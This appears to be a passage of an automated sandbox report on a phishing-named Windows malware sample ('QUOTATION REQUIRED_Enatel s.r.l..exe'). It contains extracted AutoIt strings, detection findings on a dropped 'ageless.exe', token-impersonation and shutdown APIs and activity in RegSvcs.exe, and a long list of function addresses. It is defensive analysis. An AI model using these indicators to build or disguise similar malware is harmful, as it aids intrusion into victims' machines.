mSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1d2bf571-6
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: QUOTATION REQUIRED_Enatel s.r.l..exe
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7D5EB: CreateFileW,DeviceIoControl,CloseHandle,1_2_00F7D5EB
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00F71201
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00F7E8F6
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DCE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00DCE8F6
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F180601_2_00F18060
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F820461_2_00F82046
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F782981_2_00F78298
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F4E4FF1_2_00F4E4FF
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F4676B1_2_00F4676B
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00FA48731_2_00FA4873
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F1CAF01_2_00F1CAF0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F3CAA01_2_00F3CAA0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F2CC391_2_00F2CC39
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F46DD91_2_00F46DD9
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F191C01_2_00F191C0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F2B1191_2_00F2B119
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F313941_2_00F31394
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F317061_2_00F31706
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F3781B1_2_00F3781B
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F319B01_2_00F319B0
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F2997D1_2_00F2997D
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F179201_2_00F17920
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F37A4A1_2_00F37A4A
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F37CA71_2_00F37CA7
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F31C771_2_00F31C77
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F49EEE1_2_00F49EEE
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F9BE441_2_00F9BE44
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_00F31F321_2_00F31F32
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_016003681_2_01600368
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exeCode function: 1_2_015FC87F1_2_015FC87F
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D6BF402_2_00D6BF40
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DD20462_2_00DD2046
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D680602_2_00D68060
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DC82982_2_00DC8298
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D9E4FF2_2_00D9E4FF
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D9676B2_2_00D9676B
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DF48732_2_00DF4873
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D6CAF02_2_00D6CAF0
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D8CAA02_2_00D8CAA0
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D7CC392_2_00D7CC39
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D96DD92_2_00D96DD9
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D691C02_2_00D691C0
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D7B1192_2_00D7B119
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D813942_2_00D81394
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D817062_2_00D81706
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D8781B2_2_00D8781B
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D819B02_2_00D819B0
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D7997D2_2_00D7997D
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D679202_2_00D67920
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D87A4A2_2_00D87A4A
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D87CA72_2_00D87CA7
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D81C772_2_00D81C77
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D99EEE2_2_00D99EEE
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00DEBE442_2_00DEBE44
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_00D81F322_2_00D81F32
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 2_2_0140D3802_2_0140D380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2A0883_2_00C2A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2C1463_2_00C2C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2D2783_2_00C2D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C253703_2_00C25370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2C4683_2_00C2C468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2C7383_2_00C2C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2E9883_2_00C2E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C269A03_2_00C269A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2CA083_2_00C2CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2CCD83_2_00C2CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C26FC83_2_00C26FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2CFA93_2_00C2CFA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00C2E97B3_2_00C2E97B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B4CC03_2_062B4CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B99403_2_062B9940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B86203_2_062B8620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B6E273_2_062B6E27
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B6E383_2_062B6E38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062BB2383_2_062BB238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B86113_2_062B8611
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B3E683_2_062B3E68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B26763_2_062B2676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B56403_2_062B5640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B3E583_2_062B3E58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B56503_2_062B5650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B0E8D3_2_062B0E8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B26803_2_062B2680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B0E983_2_062B0E98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B8AE83_2_062B8AE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B72F03_2_062B72F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B8ADA3_2_062B8ADA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B43203_2_062B4320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B43303_2_062B4330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B2B373_2_062B2B37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B73003_2_062B7300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B5B073_2_062B5B07
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B5B183_2_062B5B18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B13603_2_062B1360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B2B483_2_062B2B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B13563_2_062B1356
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B8FB03_2_062B8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B77B73_2_062B77B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B8F9F3_2_062B8F9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B47E83_2_062B47E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B5FE03_2_062B5FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B47F83_2_062B47F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B77C83_2_062B77C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B5FD03_2_062B5FD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B18283_2_062B1828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B18213_2_062B1821
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B30023_2_062B3002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B00063_2_062B0006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B30103_2_062B3010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B94683_2_062B9468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B94783_2_062B9478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B00403_2_062B0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B64A83_2_062B64A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B4CBD3_2_062B4CBD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B7C803_2_062B7C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B7C903_2_062B7C90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B64973_2_062B6497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B1CE23_2_062B1CE2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B04F83_2_062B04F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B1CF03_2_062B1CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B34CA3_2_062B34CA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B34D83_2_062B34D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B992F3_2_062B992F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B05083_2_062B0508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B69623_2_062B6962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B69703_2_062B6970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B51773_2_062B5177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B81493_2_062B8149
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B81583_2_062B8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B39A03_2_062B39A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B21A73_2_062B21A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B21B83_2_062B21B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B51883_2_062B5188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B398F3_2_062B398F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B09C03_2_062B09C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062B09D03_2_062B09D0
                  Source: C:\Users\user\AppData\Local\supergroup\ageless.exeCode function: 8_2_0134B6388_2_0134B638
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3D2799_2_02A3D279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A353779_2_02A35377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A371189_2_02A37118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3C1469_2_02A3C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3C7389_2_02A3C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3C46B9_2_02A3C46B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3CA0B9_2_02A3CA0B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3E9889_2_02A3E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A369E09_2_02A369E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3CFAB9_2_02A3CFAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3CCDB9_2_02A3CCDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A329E09_2_02A329E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3F9609_2_02A3F960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02A3E97F9_2_02A3E97F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663A4689_2_0663A468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663AB509_2_0663AB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06630B309_2_06630B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06639D109_2_06639D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663A4639_2_0663A463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663E5C09_2_0663E5C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663E5D09_2_0663E5D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066382689_2_06638268
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066382589_2_06638258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066300409_2_06630040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066300319_2_06630031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663E16A9_2_0663E16A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663E1789_2_0663E178
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663EFBA9_2_0663EFBA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663EFB89_2_0663EFB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663EB609_2_0663EB60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663EB509_2_0663EB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06630B239_2_06630B23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663D4629_2_0663D462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663D4709_2_0663D470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663F4019_2_0663F401
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663F4109_2_0663F410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663DD209_2_0663DD20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06639D009_2_06639D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663F86A9_2_0663F86A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663F8689_2_0663F868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0663D8C89_2_0663D8C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D99409_2_066D9940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D3E689_2_066D3E68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D26709_2_066D2670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D56409_2_066D5640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D3E589_2_066D3E58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D56509_2_066D5650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D6E279_2_066D6E27
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D86209_2_066D8620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D6E389_2_066D6E38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D86119_2_066D8611
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D0E889_2_066D0E88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D26809_2_066D2680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D0E989_2_066D0E98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D47E89_2_066D47E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D5FE09_2_066D5FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D47F89_2_066D47F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D77C89_2_066D77C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D5FD09_2_066D5FD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D77B79_2_066D77B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D8FB09_2_066D8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D8F9F9_2_066D8F9F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D94689_2_066D9468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D94789_2_066D9478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D1CE29_2_066D1CE2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D04F89_2_066D04F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D1CF09_2_066D1CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D34CA9_2_066D34CA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D4CC09_2_066D4CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D34D89_2_066D34D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D64A89_2_066D64A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D4CB09_2_066D4CB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D7C809_2_066D7C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D64979_2_066D6497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D7C909_2_066D7C90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D05089_2_066D0508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066DB2389_2_066DB238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D8AE89_2_066D8AE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D72F09_2_066D72F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D8ADA9_2_066D8ADA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D13609_2_066D1360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D2B489_2_066D2B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_066D13529_2_066D1352
